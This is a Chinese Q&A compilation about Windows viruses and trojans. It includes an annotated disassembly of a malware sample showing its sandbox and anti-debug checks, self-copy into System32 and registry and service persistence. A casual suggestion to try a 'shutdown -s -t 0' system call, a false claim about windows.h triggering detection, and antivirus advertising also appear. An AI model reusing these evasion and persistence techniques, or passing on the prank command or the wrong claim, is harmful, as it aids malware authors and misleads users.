本文目录一览：

• 1、exe病毒的代码是什么?
• 2、用devc＋＋编写的代码被windows系统认作木马病毒是为什么
• 3、请问VIRUS.win32.Magister.a木马怎么解决
• 4、请问这是木马程序么？
• 5、手机木马病毒源代码是什么

exe病毒的代码是什么?

刚刚看到一个朋友发了一个ff.exe的病毒样本，简单分析了下，第一部分，主函数代码

004061D2 /$ 55 push ebp ; Main

004061D3 |. 8BEC mov ebp, esp

004061D5 |. 81EC 1C030000 sub esp, 31C

004061DB |. 56 push esi

004061DC |. E8 FCAEFFFF call 取当前计算机用户名

004061E1 |. E8 88AFFFFF call 检查沙箱 ; 看自己是不是在虚拟机或沙箱中运行

004061E6 |. 85C0 test eax, eax

004061E8 |. 0F85 2E010000 jnz 0040631C

004061EE |. E8 C3B1FFFF call 检查模块dbghelp.dll ; 检查自己是否被调试

004061F3 |. 84C0 test al, al

004061F5 |. 0F85 21010000 jnz 0040631C

004061FB |. FF15 B8304100 call dword ptr [kernel32.GetCurrentProc; [GetCurrentProcess

00406201 |. 8BF0 mov esi, eax

00406203 |. 56 push esi

00406204 |. E8 DDAFFFFF call 004011E6 ; 调用NativeAPI查询系统信息

00406209 |. 3C 01 cmp al, 1

0040620B |. 59 pop ecx

0040620C |. 75 08 jnz short 00406216

0040620E |. 6A 00 push 0 ; /ExitCode = 0

00406210 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess

00406216 | 56 push esi ; /hObject

00406217 |. FF15 CC304100 call dword ptr [kernel32.CloseHandle] ; \CloseHandle

0040621D |. E8 63B1FFFF call 00401385 ; 反调试代码

00406222 |. 3C 01 cmp al, 1

00406224 |. 75 08 jnz short 0040622E

00406226 |. 6A 00 push 0 ; /ExitCode = 0

00406228 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess

0040622E | E8 42140000 call GetAddress ; 动态获取大量API函数地址

00406233 |. 833D 98584100 00 cmp dword ptr [415898], 0

0040623A |. 74 05 je short 00406241

0040623C |. E8 2F360000 call 00409870 ; 调用大量批处理来执行dos命令

00406241 | 8365 F8 00 and dword ptr [ebp-8], 0

00406245 |. 8365 FC 00 and dword ptr [ebp-4], 0

00406249 |. 6A 02 push 2

0040624B |. C745 F0 34594100 mov dword ptr [ebp-10], 00415934 ; ASCII "lncmmmser"

00406252 |. C745 F4 46934000 mov dword ptr [ebp-C], 00409346

00406259 |. FF15 74AA4100 call dword ptr [41AA74] ; kernel32.SetErrorMode

0040625F |. BE 04010000 mov esi, 104

00406264 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]

0040626A |. 56 push esi ; /BufSize = 104 (260.)

0040626B |. 50 push eax ; |PathBuffer

0040626C |. 6A 00 push 0 ; |/pModule = NULL

0040626E |. FF15 F4304100 call dword ptr [kernel32.GetModuleHandl; |\GetModuleHandleA

00406274 |. 50 push eax ; |hModule

00406275 |. FF15 F8304100 call dword ptr [kernel32.GetModuleFileN; \GetModuleFileNameA

0040627B |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]

00406281 |. 56 push esi ; /DestSizeMax = 104 (260.)

00406282 |. 50 push eax ; |DestString

00406283 |. 68 0C594100 push 0041590C ; |SrcString = "%windir%\system"

00406288 |. FF15 BC304100 call dword ptr [kernel32.ExpandEnvironm; \ExpandEnvironmentStringsA

0040628E |. BE 1C594100 mov esi, 0041591C ; ASCII "serivcers.exe"

00406293 |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]

00406299 |. 56 push esi ; /%s = "serivcers.exe"

0040629A |. 50 push eax ; |%s

0040629B |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218] ; |

004062A1 |. 68 40624100 push 00416240 ; |format = "%s\%s"

004062A6 |. 50 push eax ; |s

004062A7 |. FF15 94314100 call dword ptr [msvcrt.sprintf] ; \sprintf

004062AD |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]

004062B3 |. 56 push esi

004062B4 |. 50 push eax

004062B5 |. E8 7D3C0000 call CopySelfToSystem32 ; 复制自身到System32目录，并且替换Serivcers.exe

004062BA |. 83C4 18 add esp, 18

004062BD |. 85C0 test eax, eax

004062BF |. 74 35 je short 004062F6

004062C1 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]

004062C7 |. 6A 01 push 1

004062C9 |. 50 push eax

004062CA |. 68 CB5C4100 push 00415CCB ; ASCII "systemxstuff"

004062CF |. 68 CC5B4100 push 00415BCC ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions"

004062D4 |. FF35 C85B4100 push dword ptr [415BC8]

004062DA |. E8 7A2E0000 call 00409159 ; 修改关键注册表项，关联病毒为explorer打开文件夹

004062DF |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]

004062E5 |. 50 push eax

004062E6 |. E8 F8300000 call 注册系统服务

004062EB |. 83C4 18 add esp, 18

004062EE |. 6A 01 push 1 ; /ExitCode = 1

004062F0 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess

004062F6 | 68 24624100 push 00416224 ; ASCII "Enabled:Microsoft Enabled"

004062FB |. E8 00ADFFFF call 00401000

00406300 |. 59 pop ecx

00406301 |. 8D45 F0 lea eax, dword ptr [ebp-10]

00406304 |. 50 push eax

00406305 |. FF15 8CAA4100 call dword ptr [41AA8C] ; advapi32.StartServiceCtrlDispatcherA

0040630B |. 85C0 test eax, eax

0040630D |. 75 0D jnz short 0040631C

0040630F |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]

00406315 |. 50 push eax

00406316 |. E8 C8300000 call 注册系统服务

0040631B |. 59 pop ecx

0040631C | 33C0 xor eax, eax

0040631E |. 5E pop esi

0040631F |. C9 leave

00406320 \. C2 1000 retn 10

用devc＋＋编写的代码被windows系统认作木马病毒是为什么

在你编译的程序中，有没有出现:

#includewindows.h

或

system("sth");

这两个命令都是涉及电脑安全的。

system("shutdown -s -t 0")

是可以关你电脑的。可以试一下。。。

#includewindows.h包含很多东西，所以最好不要写进去

请问VIRUS.win32.Magister.a木马怎么解决

如果遇到这类隐藏性很高的、又释放驱动的病毒，很难处理。所以要先对病毒灭活，杀掉活体病毒之后就很容易查杀了

如果遇到木马或病毒杀不掉，一般是由于木马病毒正在运行，或者有其他的病毒进程守护，造成的。

1、电脑杀毒建议安装专业的杀毒软件，用杀毒软件在安全模式下全盘查杀处理病毒应当可以清理彻底，推荐试试腾讯电脑管家，它是免费专业安全软件，杀毒管理二合一(只需要下载一份），占内存小，杀毒好，防护好，无误报误杀。拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎！保证杀毒质量。如果遇到顽固木马，可以用首页——工具箱——顽固木马克星，强力查杀，效果相当不错的。

2、安全模式下，将该目录的所有文件按修改时间重新排列，将该病毒以及修改时间和病毒一样的文件删除（先纪录名字）。安全模式下，在运行中输入msconfig，在“启动”中将除了ctfmon之外的所有项目的勾去掉。在安全模式下，把刚才的名字一个一个在注册表中查找一遍，一样路径和名称的键都删除

3、如果遇到所有安全类软件打不开，就可以用安全模式试试。如果安全模式下也进入不了的话没有太好的办法了，可以尝试挂盘杀毒，也可以制作一个引导杀毒的工具，很多杀毒软件都有引导杀毒工具，或者是重装系统。

建议你在用杀毒软件检测出木马病毒后，第一时间进行清除。一般当扫描出木马后，都会帮您勾选好所有木马，只需要点击“立即清除”就可以了。有些木马需要重启电脑，为了彻底清除危害千万不要嫌麻烦哦。

请问这是木马程序么？

您好：

这应该是冰河木马病毒，为了您电脑的安全建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧，打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以的哦，腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件，是完全可以帮助您查杀病毒而且保护您的电脑的哦。

您可以点击这里下载最新版的腾讯电脑管家：最新版腾讯电脑管家下载

腾讯电脑管家企业平台：

手机木马病毒源代码是什么

1、木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。

2、木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。